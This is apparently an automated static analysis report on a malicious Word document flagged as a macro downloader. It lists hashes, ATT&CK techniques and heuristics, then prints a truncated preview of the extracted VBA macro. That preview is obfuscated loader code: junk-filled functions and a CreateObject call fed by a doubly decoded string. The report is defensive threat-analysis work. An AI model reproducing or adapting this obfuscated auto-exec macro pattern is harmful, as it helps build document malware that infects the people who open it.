Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fe9c9583ab443665…

MALICIOUS

Office (OLE)

Size: 123.4 KB
Created: 2019-10-23 19:42:00
Authoring application: Microsoft Office Word
First seen: 2020-09-04
MD5: 641f2ef2ba74127c59ea57940b048472
SHA-1: e978b4a6d78adc9fbc9b55b2ade60ff3aa781573
SHA-256: fe9c9583ab4436654eca500f40a6abef2fb268a7b6ac5cefec4684d0affd8123
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1204.002 Malicious File; T1140 Deobfuscate or Reverse Engineer

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, indicating malicious intent. The presence of the AutoOpen macro and CreateObject calls further supports this. The VBA script is heavily obfuscated and truncated, making it difficult to determine the exact payload, but the overall pattern suggests it's designed to download and execute a second-stage malicious file.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7354127-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Generic-7354127-0
  • VBA macros detected [medium, 4 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 66690 bytes
SHA-256: f81b280cb8bcedabdd376bdf37eddc0fb27208503ef08829ae015533f9ed8145
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Btjsbdzubgg"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Rhzkhlnajmtj, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Kpazynozqa, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Xniluihtt, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Mugdoaxr, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Pmnegcplsn, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Jyqdolzy, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Hqxftozpgzqh, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Ssspihgt, 7, 7, MSForms, CommandButton"

Attribute VB_Name = "Zlfvspdjm"
Function Abraham(AbrahamA)
On Error Resume Next
   ''' Zych, Paszkowski and Jedrzejczak Suite 851 Northeast Ostrowski - Szczygiel Suite 248 West
Szvtexqkf = Rnd(340)
''' Zak, Makowski and Stawicki Suite 628 Northwest Tokarski, Florczak and Malec Suite 069 West
Efdgmmeqohoro = CBool(48)
''' Kalinowski, Kowalczyk and Robak Suite 188 East Bochenek LLC Apt. 367 Northwest
Fgoauzeizfbb = CDbl(298)
Ydchbhqneo = Mtadhhqmsj
''' Graczyk - Ciesla Suite 345 Southeast Piwowarczyk, Lukaszewski and Borek Suite 628 Southeast
Yazwdaklo = Log(740)
''' Misiak - Borowiec Apt. 139 East Swiderski - Serafin Apt. 455 Southeast
Emkmwcrczth = Round(398)
''' Przybylski, Kowalewski and Wasilewski Suite 698 Southeast Lis, Wolak and Sobieraj Apt. 686 Northwest
Hwxuldtpgx = Sin("Internal802 Rau Knoll, North Freedabury, Netherlands")
''' Bartkowiak, Podgórski and Lesiak Apt. 827 Southwest Sokól - Rutkowski Apt. 133 Southwest
Set Abraham = CreateObject(Qqvayopuk(Qqvayopuk(AbrahamA)))
   ''' Szatkowski, Zyla and Filipiak Suite 613 South Swiatek, Kowal and Bielski Apt. 848 Northwest
Ejxueeyhzvh = Rnd(537)
''' Bakowski - Lipski Suite 568 Northwest Chudzik - Czyz Apt. 354 West
Eerlrzbivlg = CSng(924)
''' Bartczak, Piatek and Leszczynski Suite 341 Southeast Grudzien and Sons Suite 082 Northeast
Ayxpxflk = CInt(357)
Lkwpitqlab = Xywzspeixrhdd
''' Szyszka - Galka Apt. 323 South Florek Inc Apt. 844 Southwest
Kxcsdhrfbu = Sqr(447)
''' Pietruszka - Tarnowski Suite 371 Northeast Robak LLC Apt. 483 East
Pfzgllcaysxn = Oct(625)
''' Tomczyk, Zablocki and Pluta Apt. 037 South Szwed Inc Apt. 905 Southeast
Noudtlijf = CStr("Salad")
''' Jackowski - Krukowski Apt. 426 Northwest Brzezinski - Poplawski Suite 882 Southeast
End Function
Function Wfdbzwna()
On Error Resume Next
   ''' Jedrzejczak, Luczak and Mackowiak Suite 653 North Frackowiak - Wilczynski Suite 137 Southwest
Yhjmbpamag = Atn(997)
''' Borowiec, Nawrocki and Sliwa Apt. 352 North Zak - Paszkowski Suite 425 West
Zpmqryaptlghc = Cos(979)
''' Prus - Banas Suite 977 North Bieniek, Budzinski and Stawicki Suite 479 Southeast
Jwftugyognq = Atn(111)
Cxndrqddf = Gtrrnbbjvbr
''' Stachowiak LLC Suite 693 South Andrzejczak, Matusiak and Radomski Apt. 993 Northeast
Mrqabgdassmv = Atn(91)
''' Palka - Pluta Suite 738 Southwest Kacprzak LLC Apt. 322 Northwest
Qmckdyrn = CStr(990)
''' Jagiello LLC Suite 587 Northwest Dlugosz, Sienkiewicz and Golec Apt. 701 West
Hbflhkglhsq = CInt("Sausages")
''' Skiba Inc Apt. 844 Southeast Kruszewski, Osinski and Wilczek Suite 472 North
   ''' Rogowski and Sons Apt. 079 North Michalczyk LLC Suite 542 South
Wewpuhoqgea = Hex(946)
''' Jackowski, Maciejewski and Drabik Apt. 380 North Kucharczyk, Cieslik and Sitek Suite 799 South
Jiebufazgme = Log(581)
''' Kolasa, Sochacki and Andrzejewski Apt. 912 West Wilczynski, Furman and Kowalczuk Suite 358 East
Sianelkstyk = Log(474)
Nuccflmkhgdn = Iqprsyeofp
''' Czyz LLC Suite 934 South Staniszewski - Jarosz Apt. 867 East
Paypktgc = Int(385)
''' Urbaniak, Michalski and Luczak Apt. 590 Southeast Dobrowolski, Slowinski and Janik Suite 710 Northeast
Wdgsefkcx = Rnd(212)
''' Stachurski, Pilat and Cichon Apt. 466 Northeast Zych - Biernacki Apt. 242 E
... (truncated)